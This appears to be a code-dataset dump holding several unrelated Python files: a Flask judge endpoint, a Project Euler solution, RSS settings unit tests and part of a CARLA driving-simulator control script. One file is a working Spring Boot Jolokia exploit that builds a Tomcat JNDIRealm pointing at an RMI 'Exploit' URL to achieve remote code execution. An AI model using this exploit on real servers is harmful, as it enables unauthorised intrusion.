hexsha
stringlengths 40
40
| size
int64 6
782k
| ext
stringclasses 7
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
237
| max_stars_repo_name
stringlengths 6
72
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
list | max_stars_count
int64 1
53k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
184
| max_issues_repo_name
stringlengths 6
72
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
list | max_issues_count
int64 1
27.1k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
184
| max_forks_repo_name
stringlengths 6
72
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
list | max_forks_count
int64 1
12.2k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 6
782k
| avg_line_length
float64 2.75
664k
| max_line_length
int64 5
782k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e7a5b19efaed8d0261913c25357b701ba96f3c7a
| 2,691 |
py
|
Python
|
app/judgement/views.py
|
pushyzheng/docker-oj-web
|
119abae3763cd2e53c686a320af7f4f5af1f16ca
|
[
"MIT"
] | 2 |
2019-06-24T08:34:39.000Z
|
2019-06-27T12:23:47.000Z
|
app/judgement/views.py
|
pushyzheng/docker-oj-web
|
119abae3763cd2e53c686a320af7f4f5af1f16ca
|
[
"MIT"
] | null | null | null |
app/judgement/views.py
|
pushyzheng/docker-oj-web
|
119abae3763cd2e53c686a320af7f4f5af1f16ca
|
[
"MIT"
] | null | null | null |
# encoding:utf-8
from app import app, rabbitmq, db
from app.common.models import RoleName
from app.problem.models import Problem
from app.submission.models import Submission
from app.judgement.models import JudgementTask
from app.auth.main import auth
from utils import get_uuid, logger
import os
import re
from flask import jsonify, g, abort
from flask_expects_json import expects_json
judge_schema = {
'type': 'object',
'properties': {
'code': {'type': 'string'},
'language': {'type': 'string'},
'problem_id': {'type': 'integer'}
},
'required': ['code', 'language', 'problem_id']
}
@app.route('/judge', methods=['POST'])
@auth(role=RoleName.USER)
@expects_json(judge_schema)
def judge():
user_id = g.user.id
data = g.data
code = data['code']
language = data['language']
problem_id = data['problem_id']
problem = Problem.query.filter_by(id=problem_id).first()
if not problem:
return jsonify(data=None, message='The problem not found'), 404
if language == 'java':
err, info = valid_java_format(code)
if not err:
return jsonify(data=None, message=info), 400
user_path = 'e:/usr/pushy/{}'.format(user_id)
if not os.path.exists(user_path):
os.mkdir(user_path)
with open('{}/{}'.format(user_path, get_file_name(language)), 'w', encoding='utf-8') as f:
f.write(code)
task_id = get_uuid()
task = JudgementTask(
task_id=task_id,
problem_id=problem_id,
user_id=user_id,
language=language,
time_limit=problem.time_limit,
memory_limit=problem.memory_limit
)
submission = Submission(
id=task_id,
user_id=user_id,
problem_id=problem_id,
language=language,
code=code
)
resp = submission.to_dict()
db.session.add(submission)
db.session.commit()
logger.info("Send task => {}".format(task))
rabbitmq.send(body=task.to_json_string(), exchange='', key='go-docker-judger')
return jsonify(data=resp), 202
def get_file_name(language):
if language == 'java':
return 'Main.java'
if language == 'c':
return 'main.c'
if language == 'cpp':
return 'main.cpp'
if language == 'python':
return 'main.py'
if language == 'js':
return 'main.js'
def valid_java_format(code):
if code.find('package') != -1:
return False, '请删除包名信息 package xxx'
res = re.findall('public class (.*?)?{', code)
if len(res) == 0:
return False, '主类类名必须为 Main'
class_name = res[0].strip()
if class_name != 'Main':
return False, '主类类名必须为 Main'
return True
| 25.628571 | 94 | 0.625418 |
82172256f79551778bd0128f55c1b611129308ef
| 400 |
py
|
Python
|
euler-56.py
|
TFabijo/euler2
|
7da205ce02ae3bd12754f99c1fe69fbf20b1e3d0
|
[
"MIT"
] | null | null | null |
euler-56.py
|
TFabijo/euler2
|
7da205ce02ae3bd12754f99c1fe69fbf20b1e3d0
|
[
"MIT"
] | null | null | null |
euler-56.py
|
TFabijo/euler2
|
7da205ce02ae3bd12754f99c1fe69fbf20b1e3d0
|
[
"MIT"
] | null | null | null |
def vsota_stevk(n):
s = str(n)
vsota = 0
for x in s:
vsota += int(x)
return vsota
def euler56():
najvecja_vsota = 0
for a in range(1,100):
for b in range(1,100):
st = a ** b
s = vsota_stevk(st)
if s > najvecja_vsota:
najvecja_vsota = s
return najvecja_vsota
euler56()
| 19.047619 | 35 | 0.4625 |
4189e25901e65fdfb202785ad80b92ca2da7e587
| 1,187 |
py
|
Python
|
springboot-jolokia-realm/springboot-realm-jndi-rce.py
|
hex0wn/learn-java-bug
|
bf191905ba4c284d90e8eb51ec2806ce5b9139dd
|
[
"MIT"
] | 61 |
2020-07-02T04:30:23.000Z
|
2022-03-23T10:11:17.000Z
|
springboot-jolokia-realm/springboot-realm-jndi-rce.py
|
hex0wn/learn-java-bug
|
bf191905ba4c284d90e8eb51ec2806ce5b9139dd
|
[
"MIT"
] | 18 |
2020-07-30T08:00:06.000Z
|
2022-02-01T01:06:54.000Z
|
springboot-jolokia-realm/springboot-realm-jndi-rce.py
|
hex0wn/learn-java-bug
|
bf191905ba4c284d90e8eb51ec2806ce5b9139dd
|
[
"MIT"
] | 10 |
2020-07-03T09:12:55.000Z
|
2022-03-09T11:13:56.000Z
|
#!/usr/bin/env python3
# coding: utf-8
# Referer: https://ricterz.me/posts/2019-03-06-yet-another-way-to-exploit-spring-boot-actuators-via-jolokia.txt
import requests
import json
url = 'http://127.0.0.1:8080/actuator/jolokia'
#url = 'http://127.0.0.1:8080/jolokia'
jndi = 'rmi://localhost:1099/Exploit'
create_realm = {
"mbean": "Tomcat:type=MBeanFactory",
"type": "EXEC",
"operation": "createJNDIRealm",
"arguments": ["Tomcat:type=Engine"]
}
wirte_factory = {
"mbean": "Tomcat:realmPath=/realm0,type=Realm",
"type": "WRITE",
"attribute": "contextFactory",
"value": "com.sun.jndi.rmi.registry.RegistryContextFactory"
}
write_url = {
"mbean": "Tomcat:realmPath=/realm0,type=Realm",
"type": "WRITE",
"attribute": "connectionURL",
"value": jndi
}
stop = {
"mbean": "Tomcat:realmPath=/realm0,type=Realm",
"type": "EXEC",
"operation": "stop",
"arguments": []
}
start = {
"mbean": "Tomcat:realmPath=/realm0,type=Realm",
"type": "EXEC",
"operation": "start",
"arguments": []
}
flow = [create_realm, wirte_factory, write_url, stop, start]
r = requests.post(url, json=flow)
r.json()
print(r.status_code)
| 21.581818 | 111 | 0.641955 |
ec38d9d24cd534832a026c3239e7fd11542cf1da
| 4,475 |
py
|
Python
|
Tests/test_settings.py
|
dereklm12880/rssticker
|
d90e8c00811d67bd9fb8104bbb6ec98aae5221f4
|
[
"MIT"
] | 2 |
2020-02-26T01:54:26.000Z
|
2020-04-27T20:09:14.000Z
|
Tests/test_settings.py
|
dereklm12880/rssticker
|
d90e8c00811d67bd9fb8104bbb6ec98aae5221f4
|
[
"MIT"
] | 17 |
2020-02-29T02:43:44.000Z
|
2020-04-27T20:38:44.000Z
|
Tests/test_settings.py
|
dereklm12880/rssticker
|
d90e8c00811d67bd9fb8104bbb6ec98aae5221f4
|
[
"MIT"
] | 8 |
2020-02-26T21:37:36.000Z
|
2020-06-23T00:01:27.000Z
|
import os
import unittest
from unittest import mock
import yaml
from mock import patch
from RSS.model.settings import SettingsModel
import builtins
class TestRssSettings(unittest.TestCase):
"""Test class for RSS.model.settings.SettingsModel."""
_return_value = {"feeds": ["http://fakefeed.com", "http://anotherfakefeed.com"]}
_mock_open = mock.mock_open(read_data='')
def test_load_settings_no_file(self):
""" Unit test for RSS.model.settings.SettingsModel.load_settings.
Tests to make sure that the .yaml file exists.
"""
with patch.object(yaml, 'load', return_value=self._return_value) as mock_method:
with self.assertRaises(Exception):
_settings = SettingsModel()
_settings.filename = 'ghost_file.yaml'
_settings.load_settings()
def test_load_settings(self):
""" Unit test for RSS.model.settings.SettingsModel.next_url.
Tests to check feeds in yaml file that can be loaded.
"""
with patch.object(yaml, 'load', return_value=self._return_value) as mock_method:
with mock.patch('builtins.open', self._mock_open):
_settings = SettingsModel()
_settings.filename = 'dummy.yaml'
_loaded_settings = _settings.load_settings().settings
assert _loaded_settings['feeds'] == self._return_value['feeds']
def test_save_settings(self):
""" Unit test for RSS.model.settings.SettingsModel.save_settings.
Tests to check a dictionary of configurable values to be converted into the yaml file.
"""
_settings = SettingsModel()
_settings.filename = 'dummy_.yaml'
_settings.save_settings(self._return_value)
assert _settings.load_settings().settings['feeds'] == self._return_value['feeds']
os.remove(_settings.filename)
def test_save_settings_again(self):
""" Unit test for RSS.model.settings.SettingsModel.save_settings.
Tests to check a dictionary of configurable values to be converted into the yaml file.
"""
_settings = SettingsModel()
_settings.filename = 'dummy_.yaml'
_settings.settings = self._return_value
_settings.save_settings()
assert _settings.load_settings().settings['feeds'] == self._return_value['feeds']
os.remove(_settings.filename)
def test_save_settings_fail_set_via_settings_class_member(self):
""" Unit test for RSS.model.settings.SettingsModel.save_settings.
Tests to check the function is throwing an exception because of the settings class.
"""
_settings = SettingsModel()
_settings.filename = 'dummy_.yaml'
_settings.settings = 'Bob dole was here'
with self.assertRaises(Exception):
_settings.save_settings()
def test_save_settings_fail_set_via_argument(self):
""" Unit test for RSS.model.settings.SettingsModel.save_settings.
Tests to check the function is throwing an exception because the argument is invalid.
"""
_settings = SettingsModel()
_settings.filename = 'dummy_.yaml'
with self.assertRaises(Exception):
_settings.save_settings(12345)
def test_next_url(self):
""" Unit test for RSS.model.settings.SettingsModel.next_url.
Tests to assert that are are valid feeds in the yaml file.
"""
with patch.object(yaml, 'load', return_value=self._return_value) as mock_method:
_settings = SettingsModel()
_settings.filename = 'dummy.yaml'
_settings.load_settings()
_url = _settings.next_url()
assert _url == 'http://fakefeed.com'
_url = _settings.next_url()
assert _url == 'http://anotherfakefeed.com'
_url = _settings.next_url()
assert _url == 'http://fakefeed.com'
def test_next_url_with_exception(self):
""" Unit test for RSS.model.settings.SettingsModel.next_url.
Tests to check that the function is throwing an exception when the return value is empty.
"""
with patch.object(yaml, 'load', return_value={}) as mock_method:
_settings = SettingsModel()
_settings.filename = 'dummy.yaml'
_settings.load_settings()
with self.assertRaises(Exception):
_url = _settings.next_url()
| 37.605042 | 97 | 0.653184 |
ec563901f108bd7ef469d7f45cba82dd666cd850
| 37,134 |
py
|
Python
|
PythonAPI/examples/rss/manual_control_rss.py
|
cpc/carla
|
2b4af4c08c751461e23558809a1d8dcb5dc740dc
|
[
"MIT"
] | 7,883 |
2017-11-10T16:49:23.000Z
|
2022-03-31T18:48:47.000Z
|
PythonAPI/examples/rss/manual_control_rss.py
|
cpc/carla
|
2b4af4c08c751461e23558809a1d8dcb5dc740dc
|
[
"MIT"
] | 4,558 |
2017-11-10T17:45:30.000Z
|
2022-03-31T23:30:02.000Z
|
PythonAPI/examples/rss/manual_control_rss.py
|
cpc/carla
|
2b4af4c08c751461e23558809a1d8dcb5dc740dc
|
[
"MIT"
] | 2,547 |
2017-11-13T03:22:44.000Z
|
2022-03-31T10:39:30.000Z
|
#!/usr/bin/env python
# Copyright (c) 2019 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
# Copyright (c) 2019-2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
# Allows controlling a vehicle with a keyboard. For a simpler and more
# documented example, please take a look at tutorial.py.
"""
Welcome to CARLA manual control.
Use ARROWS or WASD keys for control.
W : throttle
S : brake
AD : steer
Q : toggle reverse
Space : hand-brake
P : toggle autopilot
TAB : change view
Backspace : change vehicle
R : toggle recording images to disk
F2 : toggle RSS visualization mode
B : toggle RSS Road Boundaries Mode
G : RSS check drop current route
T : toggle RSS
N : pause simulation
F1 : toggle HUD
H/? : toggle help
ESC : quit
"""
from __future__ import print_function
# ==============================================================================
# -- find carla module ---------------------------------------------------------
# ==============================================================================
import glob
import os
import sys
import signal
try:
sys.path.append(glob.glob(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) + '/carla/dist/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
# ==============================================================================
# -- imports -------------------------------------------------------------------
# ==============================================================================
import carla
from carla import ColorConverter as cc
import argparse
import logging
import math
import random
import weakref
from rss_sensor import RssSensor # pylint: disable=relative-import
from rss_visualization import RssUnstructuredSceneVisualizer, RssBoundingBoxVisualizer, RssStateVisualizer # pylint: disable=relative-import
try:
import pygame
from pygame.locals import KMOD_CTRL
from pygame.locals import KMOD_SHIFT
from pygame.locals import K_BACKSPACE
from pygame.locals import K_TAB
from pygame.locals import K_DOWN
from pygame.locals import K_ESCAPE
from pygame.locals import K_F1
from pygame.locals import K_F2
from pygame.locals import K_LEFT
from pygame.locals import K_RIGHT
from pygame.locals import K_SLASH
from pygame.locals import K_SPACE
from pygame.locals import K_UP
from pygame.locals import K_a
from pygame.locals import K_b
from pygame.locals import K_d
from pygame.locals import K_g
from pygame.locals import K_h
from pygame.locals import K_n
from pygame.locals import K_p
from pygame.locals import K_q
from pygame.locals import K_r
from pygame.locals import K_s
from pygame.locals import K_w
from pygame.locals import K_l
from pygame.locals import K_i
from pygame.locals import K_z
from pygame.locals import K_x
from pygame.locals import MOUSEBUTTONDOWN
from pygame.locals import MOUSEBUTTONUP
except ImportError:
raise RuntimeError('cannot import pygame, make sure pygame package is installed')
try:
import numpy as np
except ImportError:
raise RuntimeError('cannot import numpy, make sure numpy package is installed')
# ==============================================================================
# -- World ---------------------------------------------------------------------
# ==============================================================================
class World(object):
def __init__(self, carla_world, args):
self.world = carla_world
self.actor_role_name = args.rolename
self.dim = (args.width, args.height)
try:
self.map = self.world.get_map()
except RuntimeError as error:
print('RuntimeError: {}'.format(error))
print(' The server could not send the OpenDRIVE (.xodr) file:')
print(' Make sure it exists, has the same name of your town, and is correct.')
sys.exit(1)
self.external_actor = args.externalActor
self.hud = HUD(args.width, args.height, carla_world)
self.recording_frame_num = 0
self.recording = False
self.recording_dir_num = 0
self.player = None
self.actors = []
self.rss_sensor = None
self.rss_unstructured_scene_visualizer = None
self.rss_bounding_box_visualizer = None
self._actor_filter = args.filter
if not self._actor_filter.startswith("vehicle."):
print('Error: RSS only supports vehicles as ego.')
sys.exit(1)
self.restart()
self.world_tick_id = self.world.on_tick(self.on_world_tick)
def on_world_tick(self, world_snapshot):
self.hud.on_world_tick(world_snapshot)
def toggle_pause(self):
settings = self.world.get_settings()
self.pause_simulation(not settings.synchronous_mode)
def pause_simulation(self, pause):
settings = self.world.get_settings()
if pause and not settings.synchronous_mode:
settings.synchronous_mode = True
settings.fixed_delta_seconds = 0.05
self.world.apply_settings(settings)
elif not pause and settings.synchronous_mode:
settings.synchronous_mode = False
settings.fixed_delta_seconds = None
self.world.apply_settings(settings)
def restart(self):
if self.external_actor:
# Check whether there is already an actor with defined role name
for actor in self.world.get_actors():
if actor.attributes.get('role_name') == self.actor_role_name:
self.player = actor
break
else:
# Get a random blueprint.
blueprint = random.choice(self.world.get_blueprint_library().filter(self._actor_filter))
blueprint.set_attribute('role_name', self.actor_role_name)
if blueprint.has_attribute('color'):
color = random.choice(blueprint.get_attribute('color').recommended_values)
blueprint.set_attribute('color', color)
if blueprint.has_attribute('driver_id'):
driver_id = random.choice(blueprint.get_attribute('driver_id').recommended_values)
blueprint.set_attribute('driver_id', driver_id)
if blueprint.has_attribute('is_invincible'):
blueprint.set_attribute('is_invincible', 'true')
# Spawn the player.
if self.player is not None:
spawn_point = self.player.get_transform()
spawn_point.location.z += 2.0
spawn_point.rotation.roll = 0.0
spawn_point.rotation.pitch = 0.0
self.destroy()
self.player = self.world.try_spawn_actor(blueprint, spawn_point)
while self.player is None:
if not self.map.get_spawn_points():
print('There are no spawn points available in your map/town.')
print('Please add some Vehicle Spawn Point to your UE4 scene.')
sys.exit(1)
spawn_points = self.map.get_spawn_points()
spawn_point = random.choice(spawn_points) if spawn_points else carla.Transform()
self.player = self.world.try_spawn_actor(blueprint, spawn_point)
if self.external_actor:
ego_sensors = []
for actor in self.world.get_actors():
if actor.parent == self.player:
ego_sensors.append(actor)
for ego_sensor in ego_sensors:
if ego_sensor is not None:
ego_sensor.destroy()
# Set up the sensors.
self.camera = Camera(self.player, self.dim)
self.rss_unstructured_scene_visualizer = RssUnstructuredSceneVisualizer(self.player, self.world, self.dim)
self.rss_bounding_box_visualizer = RssBoundingBoxVisualizer(self.dim, self.world, self.camera.sensor)
self.rss_sensor = RssSensor(self.player, self.world,
self.rss_unstructured_scene_visualizer, self.rss_bounding_box_visualizer, self.hud.rss_state_visualizer)
def tick(self, clock):
self.hud.tick(self.player, clock)
def toggle_recording(self):
if not self.recording:
dir_name = "_out%04d" % self.recording_dir_num
while os.path.exists(dir_name):
self.recording_dir_num += 1
dir_name = "_out%04d" % self.recording_dir_num
self.recording_frame_num = 0
os.mkdir(dir_name)
else:
self.hud.notification('Recording finished (folder: _out%04d)' % self.recording_dir_num)
self.recording = not self.recording
def render(self, display):
self.camera.render(display)
self.rss_bounding_box_visualizer.render(display, self.camera.current_frame)
self.rss_unstructured_scene_visualizer.render(display)
self.hud.render(display)
if self.recording:
pygame.image.save(display, "_out%04d/%08d.bmp" % (self.recording_dir_num, self.recording_frame_num))
self.recording_frame_num += 1
def destroy(self):
# stop from ticking
if self.world_tick_id:
self.world.remove_on_tick(self.world_tick_id)
if self.camera:
self.camera.destroy()
if self.rss_sensor:
self.rss_sensor.destroy()
if self.rss_unstructured_scene_visualizer:
self.rss_unstructured_scene_visualizer.destroy()
if self.player:
self.player.destroy()
# ==============================================================================
# -- Camera --------------------------------------------------------------------
# ==============================================================================
class Camera(object):
def __init__(self, parent_actor, display_dimensions):
self.surface = None
self._parent = parent_actor
self.current_frame = None
bp_library = self._parent.get_world().get_blueprint_library()
bp = bp_library.find('sensor.camera.rgb')
bp.set_attribute('image_size_x', str(display_dimensions[0]))
bp.set_attribute('image_size_y', str(display_dimensions[1]))
self.sensor = self._parent.get_world().spawn_actor(bp, carla.Transform(carla.Location(
x=-5.5, z=2.5), carla.Rotation(pitch=8.0)), attach_to=self._parent, attachment_type=carla.AttachmentType.SpringArm)
# We need to pass the lambda a weak reference to self to avoid
# circular reference.
weak_self = weakref.ref(self)
self.sensor.listen(lambda image: Camera._parse_image(weak_self, image))
def destroy(self):
self.sensor.stop()
self.sensor.destroy()
self.sensor = None
def render(self, display):
if self.surface is not None:
display.blit(self.surface, (0, 0))
@staticmethod
def _parse_image(weak_self, image):
self = weak_self()
if not self:
return
self.current_frame = image.frame
image.convert(cc.Raw)
array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
self.surface = pygame.surfarray.make_surface(array.swapaxes(0, 1))
# ==============================================================================
# -- VehicleControl -----------------------------------------------------------
# ==============================================================================
class VehicleControl(object):
MOUSE_STEERING_RANGE = 200
signal_received = False
"""Class that handles keyboard input."""
def __init__(self, world, start_in_autopilot):
self._autopilot_enabled = start_in_autopilot
self._world = world
self._control = carla.VehicleControl()
self._lights = carla.VehicleLightState.NONE
world.player.set_autopilot(self._autopilot_enabled)
self._restrictor = carla.RssRestrictor()
self._vehicle_physics = world.player.get_physics_control()
world.player.set_light_state(self._lights)
self._steer_cache = 0.0
self._mouse_steering_center = None
self._surface = pygame.Surface((self.MOUSE_STEERING_RANGE * 2, self.MOUSE_STEERING_RANGE * 2))
self._surface.set_colorkey(pygame.Color('black'))
self._surface.set_alpha(60)
line_width = 2
pygame.draw.polygon(self._surface,
(0, 0, 255),
[
(0, 0),
(0, self.MOUSE_STEERING_RANGE * 2 - line_width),
(self.MOUSE_STEERING_RANGE * 2 - line_width,
self.MOUSE_STEERING_RANGE * 2 - line_width),
(self.MOUSE_STEERING_RANGE * 2 - line_width, 0),
(0, 0)
], line_width)
pygame.draw.polygon(self._surface,
(0, 0, 255),
[
(0, self.MOUSE_STEERING_RANGE),
(self.MOUSE_STEERING_RANGE * 2, self.MOUSE_STEERING_RANGE)
], line_width)
pygame.draw.polygon(self._surface,
(0, 0, 255),
[
(self.MOUSE_STEERING_RANGE, 0),
(self.MOUSE_STEERING_RANGE, self.MOUSE_STEERING_RANGE * 2)
], line_width)
world.hud.notification("Press 'H' or '?' for help.", seconds=4.0)
def render(self, display):
if self._mouse_steering_center:
display.blit(
self._surface, (self._mouse_steering_center[0] - self.MOUSE_STEERING_RANGE, self._mouse_steering_center[1] - self.MOUSE_STEERING_RANGE))
@staticmethod
def signal_handler(signum, _):
print('\nReceived signal {}. Trigger stopping...'.format(signum))
VehicleControl.signal_received = True
def parse_events(self, world, clock):
if VehicleControl.signal_received:
print('\nAccepted signal. Stopping loop...')
return True
if isinstance(self._control, carla.VehicleControl):
current_lights = self._lights
for event in pygame.event.get():
if event.type == pygame.QUIT:
return True
elif event.type == pygame.KEYUP:
if self._is_quit_shortcut(event.key):
return True
elif event.key == K_BACKSPACE:
if self._autopilot_enabled:
world.player.set_autopilot(False)
world.restart()
world.player.set_autopilot(True)
else:
world.restart()
elif event.key == K_F1:
world.hud.toggle_info()
elif event.key == K_h or (event.key == K_SLASH and pygame.key.get_mods() & KMOD_SHIFT):
world.hud.help.toggle()
elif event.key == K_TAB:
world.rss_unstructured_scene_visualizer.toggle_camera()
elif event.key == K_n:
world.toggle_pause()
elif event.key == K_r:
world.toggle_recording()
elif event.key == K_F2:
if self._world and self._world.rss_sensor:
self._world.rss_sensor.toggle_debug_visualization_mode()
elif event.key == K_b:
if self._world and self._world.rss_sensor:
if self._world.rss_sensor.sensor.road_boundaries_mode == carla.RssRoadBoundariesMode.Off:
self._world.rss_sensor.sensor.road_boundaries_mode = carla.RssRoadBoundariesMode.On
print("carla.RssRoadBoundariesMode.On")
else:
self._world.rss_sensor.sensor.road_boundaries_mode = carla.RssRoadBoundariesMode.Off
print("carla.RssRoadBoundariesMode.Off")
elif event.key == K_g:
if self._world and self._world.rss_sensor:
self._world.rss_sensor.drop_route()
if isinstance(self._control, carla.VehicleControl):
if event.key == K_q:
self._control.gear = 1 if self._control.reverse else -1
elif event.key == K_p and not pygame.key.get_mods() & KMOD_CTRL:
self._autopilot_enabled = not self._autopilot_enabled
world.player.set_autopilot(self._autopilot_enabled)
world.hud.notification(
'Autopilot %s' % ('On' if self._autopilot_enabled else 'Off'))
elif event.key == K_l and pygame.key.get_mods() & KMOD_CTRL:
current_lights ^= carla.VehicleLightState.Special1
elif event.key == K_l and pygame.key.get_mods() & KMOD_SHIFT:
current_lights ^= carla.VehicleLightState.HighBeam
elif event.key == K_l:
# Use 'L' key to switch between lights:
# closed -> position -> low beam -> fog
if not self._lights & carla.VehicleLightState.Position:
world.hud.notification("Position lights")
current_lights |= carla.VehicleLightState.Position
else:
world.hud.notification("Low beam lights")
current_lights |= carla.VehicleLightState.LowBeam
if self._lights & carla.VehicleLightState.LowBeam:
world.hud.notification("Fog lights")
current_lights |= carla.VehicleLightState.Fog
if self._lights & carla.VehicleLightState.Fog:
world.hud.notification("Lights off")
current_lights ^= carla.VehicleLightState.Position
current_lights ^= carla.VehicleLightState.LowBeam
current_lights ^= carla.VehicleLightState.Fog
elif event.key == K_i:
current_lights ^= carla.VehicleLightState.Interior
elif event.key == K_z:
current_lights ^= carla.VehicleLightState.LeftBlinker
elif event.key == K_x:
current_lights ^= carla.VehicleLightState.RightBlinker
elif event.type == MOUSEBUTTONDOWN:
# store current mouse position for mouse-steering
if event.button == 1:
self._mouse_steering_center = event.pos
elif event.type == MOUSEBUTTONUP:
if event.button == 1:
self._mouse_steering_center = None
if not self._autopilot_enabled:
prev_steer_cache = self._steer_cache
self._parse_vehicle_keys(pygame.key.get_pressed(), clock.get_time())
if pygame.mouse.get_pressed()[0]:
self._parse_mouse(pygame.mouse.get_pos())
self._control.reverse = self._control.gear < 0
vehicle_control = self._control
world.hud.original_vehicle_control = vehicle_control
world.hud.restricted_vehicle_control = vehicle_control
# limit speed to 30kmh
v = self._world.player.get_velocity()
if (3.6 * math.sqrt(v.x**2 + v.y**2 + v.z**2)) > 30.0:
self._control.throttle = 0
# if self._world.rss_sensor and self._world.rss_sensor.ego_dynamics_on_route and not self._world.rss_sensor.ego_dynamics_on_route.ego_center_within_route:
# print ("Not on route!" + str(self._world.rss_sensor.ego_dynamics_on_route))
if self._restrictor:
rss_proper_response = self._world.rss_sensor.proper_response if self._world.rss_sensor and self._world.rss_sensor.response_valid else None
if rss_proper_response:
if not (pygame.key.get_mods() & KMOD_CTRL):
vehicle_control = self._restrictor.restrict_vehicle_control(
vehicle_control, rss_proper_response, self._world.rss_sensor.ego_dynamics_on_route, self._vehicle_physics)
world.hud.restricted_vehicle_control = vehicle_control
world.hud.allowed_steering_ranges = self._world.rss_sensor.get_steering_ranges()
if world.hud.original_vehicle_control.steer != world.hud.restricted_vehicle_control.steer:
self._steer_cache = prev_steer_cache
# Set automatic control-related vehicle lights
if vehicle_control.brake:
current_lights |= carla.VehicleLightState.Brake
else: # Remove the Brake flag
current_lights &= carla.VehicleLightState.All ^ carla.VehicleLightState.Brake
if vehicle_control.reverse:
current_lights |= carla.VehicleLightState.Reverse
else: # Remove the Reverse flag
current_lights &= carla.VehicleLightState.All ^ carla.VehicleLightState.Reverse
if current_lights != self._lights: # Change the light state only if necessary
self._lights = current_lights
world.player.set_light_state(carla.VehicleLightState(self._lights))
world.player.apply_control(vehicle_control)
def _parse_vehicle_keys(self, keys, milliseconds):
if keys[K_UP] or keys[K_w]:
self._control.throttle = min(self._control.throttle + 0.2, 1)
else:
self._control.throttle = max(self._control.throttle - 0.2, 0)
if keys[K_DOWN] or keys[K_s]:
self._control.brake = min(self._control.brake + 0.2, 1)
else:
self._control.brake = max(self._control.brake - 0.2, 0)
steer_increment = 5e-4 * milliseconds
if keys[K_LEFT] or keys[K_a]:
if self._steer_cache > 0:
self._steer_cache = 0
else:
self._steer_cache -= steer_increment
elif keys[K_RIGHT] or keys[K_d]:
if self._steer_cache < 0:
self._steer_cache = 0
else:
self._steer_cache += steer_increment
elif self._steer_cache > 0:
self._steer_cache = max(self._steer_cache - steer_increment, 0.0)
elif self._steer_cache < 0:
self._steer_cache = min(self._steer_cache + steer_increment, 0.0)
else:
self._steer_cache = 0
self._steer_cache = min(1.0, max(-1.0, self._steer_cache))
self._control.steer = round(self._steer_cache, 1)
self._control.hand_brake = keys[K_SPACE]
def _parse_mouse(self, pos):
if not self._mouse_steering_center:
return
lateral = float(pos[0] - self._mouse_steering_center[0])
longitudinal = float(pos[1] - self._mouse_steering_center[1])
max_val = self.MOUSE_STEERING_RANGE
lateral = -max_val if lateral < -max_val else max_val if lateral > max_val else lateral
longitudinal = -max_val if longitudinal < -max_val else max_val if longitudinal > max_val else longitudinal
self._control.steer = lateral / max_val
if longitudinal < 0.0:
self._control.throttle = -longitudinal / max_val
self._control.brake = 0.0
elif longitudinal > 0.0:
self._control.throttle = 0.0
self._control.brake = longitudinal / max_val
@staticmethod
def _is_quit_shortcut(key):
return (key == K_ESCAPE) or (key == K_q and pygame.key.get_mods() & KMOD_CTRL)
# ==============================================================================
# -- HUD -----------------------------------------------------------------------
# ==============================================================================
class HUD(object):
def __init__(self, width, height, world):
self.dim = (width, height)
self._world = world
self.map_name = world.get_map().name
font = pygame.font.Font(pygame.font.get_default_font(), 20)
font_name = 'courier' if os.name == 'nt' else 'mono'
fonts = [x for x in pygame.font.get_fonts() if font_name in x]
default_font = 'ubuntumono'
mono = default_font if default_font in fonts else fonts[0]
mono = pygame.font.match_font(mono)
self._font_mono = pygame.font.Font(mono, 12 if os.name == 'nt' else 14)
self._notifications = FadingText(font, (width, 40), (0, height - 40))
self.help = HelpText(pygame.font.Font(mono, 16), width, height)
self.server_fps = 0
self.frame = 0
self.simulation_time = 0
self.original_vehicle_control = None
self.restricted_vehicle_control = None
self.allowed_steering_ranges = []
self._show_info = True
self._info_text = []
self._server_clock = pygame.time.Clock()
self.rss_state_visualizer = RssStateVisualizer(self.dim, self._font_mono, self._world)
def on_world_tick(self, timestamp):
self._server_clock.tick()
self.server_fps = self._server_clock.get_fps()
self.frame = timestamp.frame
self.simulation_time = timestamp.elapsed_seconds
def tick(self, player, clock):
self._notifications.tick(clock)
if not self._show_info:
return
t = player.get_transform()
v = player.get_velocity()
c = player.get_control()
self._info_text = [
'Server: % 16.0f FPS' % self.server_fps,
'Client: % 16.0f FPS' % clock.get_fps(),
'Map: % 20s' % self.map_name,
'',
'Speed: % 15.0f km/h' % (3.6 * math.sqrt(v.x**2 + v.y**2 + v.z**2)),
'Location:% 20s' % ('(% 5.1f, % 5.1f)' % (t.location.x, t.location.y)),
'Heading: % 20.2f' % math.radians(t.rotation.yaw),
'']
if self.original_vehicle_control:
orig_control = self.original_vehicle_control
restricted_control = self.restricted_vehicle_control
allowed_steering_ranges = self.allowed_steering_ranges
self._info_text += [
('Throttle:', orig_control.throttle, 0.0, 1.0, restricted_control.throttle),
('Steer:', orig_control.steer, -1.0, 1.0, restricted_control.steer, allowed_steering_ranges),
('Brake:', orig_control.brake, 0.0, 1.0, restricted_control.brake)]
self._info_text += [
('Reverse:', c.reverse),
'']
def toggle_info(self):
self._show_info = not self._show_info
def notification(self, text, seconds=2.0):
self._notifications.set_text(text, seconds=seconds)
def error(self, text):
